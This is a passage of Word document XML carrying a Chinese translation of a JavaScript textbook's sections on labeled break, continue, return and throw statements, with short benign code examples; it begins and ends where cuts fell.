        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>关键字和</w:t>
      </w:r>
      <w:r>
        <w:t>labelname</w:t>
      </w:r>
      <w:r>
        <w:t>之间不能换行。因为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>可以给语句自动补全省略掉的分号，如果</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>关键字和标签之间有</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>换行，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaSc</w:t>
      </w:r>
      <w:r>
        <w:t>ript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器会认为你在使用</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>不带标签的最简形式，因此会在</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>后补充分号（参照</w:t>
      </w:r>
      <w:r>
        <w:t>2.5</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当你希望通过</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>来跳出非就近的循环体或者</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句时，就会用到带标签的</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句。下面是示例代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var matrix=getData();//</w:t>
      </w:r>
      <w:r>
        <w:t>从某处得到一个二维数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将矩阵中所有元素进行求和</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sum=0,success=false;//</w:t>
      </w:r>
      <w:r>
        <w:t>从标签名开始，以便在报错时退出程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>compute_sum:if(matrix){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for(var </w:t>
      </w:r>
      <w:r>
        <w:t>x=0;x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>matrix.length;x++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var row=matrix[x];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!row)break compute_sum;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var y=0;y</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>row.length;y++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var cell=row[y];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(isNaN(cell))break compute_sum;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>sum+=cell;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>success=true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//break</w:t>
      </w:r>
      <w:r>
        <w:t>语句跳转至此</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果在</w:t>
      </w:r>
      <w:r>
        <w:t>success==false</w:t>
      </w:r>
      <w:r>
        <w:t>的条件下到达这里，说明我们给出的矩阵中有错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>否则将矩阵中所有的元素进行</w:t>
      </w:r>
      <w:r>
        <w:t>求和</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，需要注意的是，不管</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句带不带标签，它的控制权都无法越过函数的边界。比如，对于一条带标签的函数定义语句来说，不能从函数内部通过这个标签来跳转到函数外部。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="5_6_3_continueYu_Ju_"/>
      <w:r>
        <w:t>5.6.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>语句和</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句非常类似，但它不是退出循环，而是转而执行下一次循环。</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>语句的语法和</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句语法一样简单：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>continue;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>语句同样可以带有标签：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>continue labelname;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不管</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>语句带不带标签，它只能在循环体内使用。在其他地方使用将会报语法错误。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当执行到</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>语句的时候，当前的循环逻辑就终止了，随即执行下一次循环，在不同类型的循环中，</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>的行为也有所区别：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环中，在循环开始处指定的</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>会重复检测，如果检测结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，循环体会从头开始执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>do/while</w:t>
      </w:r>
      <w:r>
        <w:t>循环中，程序的执行直接跳到循环结尾处，这时会重新判断循环条件，之后才会继续下一次循环。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环中，首先计算自增表达式，然后再次检测</w:t>
      </w:r>
      <w:r>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:t>表达式，用以判断是否执行循环体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环中，循环开始遍历下一个属性名，这个属性名赋给了指定的变量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>语句在</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环中的区别，</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环直接进入下一轮的循环条件判断，但</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环首先计算其</w:t>
      </w:r>
      <w:r>
        <w:t>increment</w:t>
      </w:r>
      <w:r>
        <w:t>表达式，然后判断循环条件。之前的章节讨论了和</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>等价</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环的行为。但由于</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>在这两种循环中的行为表现不同，因此使用</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环不可能完美地模拟等价的</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面这段代码展示了不带标签的</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>语句，当产生</w:t>
      </w:r>
      <w:r>
        <w:t>一个错误的时候跳过当前循环的后续逻辑：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>data.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!data[i])continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>不能处理</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>total+=data[i];</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和</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句类似，带标签的</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>语句可以用在嵌套的循环中，用以跳出多层次嵌套的循环体逻辑。同样和</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句类似，在</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>语句和</w:t>
      </w:r>
      <w:r>
        <w:t>labelname</w:t>
      </w:r>
      <w:r>
        <w:t>之间不能有换行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="5_6_4_returnYu_Ju_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.6.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>回想一下，函数调用是一种表达式，而所有表达式都有值。函数中的</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句既</w:t>
      </w:r>
      <w:r>
        <w:t>是指定函数调用后的返回值。这里是</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句的语法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return expression;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句只能在函数体内出现，如果不是的话会报语法错误。当执行到</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句的时候，函数终止执行，并返回</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>的值给调用程序。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function square(x){return x*x;}//</w:t>
      </w:r>
      <w:r>
        <w:t>一个包含</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>square(2)//</w:t>
      </w:r>
      <w:r>
        <w:t>调用结果为</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果没有</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句，则函数调用仅依次执行函数体内的每一条语句直到函数结束，最后返回调用程序。这种情况下，调用表</w:t>
      </w:r>
      <w:r>
        <w:t>达式的结果是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句经常作为函数内的最后一条语句出现，但并不是说要一定放在函数最后，即使在执行</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句的时候还有很多后续代码没有执行到，这时函数也还会返回调用程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句可以单独使用而不必带有</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>，这样的话函数也会向调用程序返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function display_object(o){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果参数是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>则立即返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!o)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>其他的逻辑</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由于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>可以自动插入分号（见</w:t>
      </w:r>
      <w:r>
        <w:t>2.5</w:t>
      </w:r>
      <w:r>
        <w:t>节），因此在</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>关键字和它后面的表达式之间不能有换行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="5_6_5_throwYu_Ju_"/>
      <w:r>
        <w:t>5.6.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>throw</w:t>
      </w:r>
      <w:r>
        <w:t>语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所谓异常（</w:t>
      </w:r>
      <w:r>
        <w:t>exception</w:t>
      </w:r>
      <w:r>
        <w:t>）是当发生了某种异常情况或错误时产生的一个信号。抛出异常，就是用信号通知发生了错误或异常状况。捕获异常是指处理这个信号，即采取必要的手段从异常中恢复。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，当产生运行时错误或者程序使用</w:t>
      </w:r>
      <w:r>
        <w:t>throw</w:t>
      </w:r>
      <w:r>
        <w:t>语句时就会显式地抛出异常。使用</w:t>
      </w:r>
      <w:r>
        <w:t>try/catch/finally</w:t>
      </w:r>
      <w:r>
        <w:t>语句可以捕获异常，下一节会对它作详细介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>throw</w:t>
      </w:r>
      <w:r>
        <w:t>语句的语法</w:t>
      </w:r>
      <w:r>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw expression;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>的值可以是任意类型的。可以抛出一个代表错误码的数字，或者包含可读的错误消息的字符串。当</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器抛出异常的时候通常采用</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>类型和其子类型，当然也可以使用它们。一个</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象有一个</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性表示错误类型，一个</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性用来存放传递给构造函数的字符串（参照第三部分的</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>类），在下面的例子中，当使用非法参数调用函数时就抛出一个</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function factorial(x){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果输入参数</w:t>
      </w:r>
      <w:r>
        <w:t>是非法的，则抛出一个异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
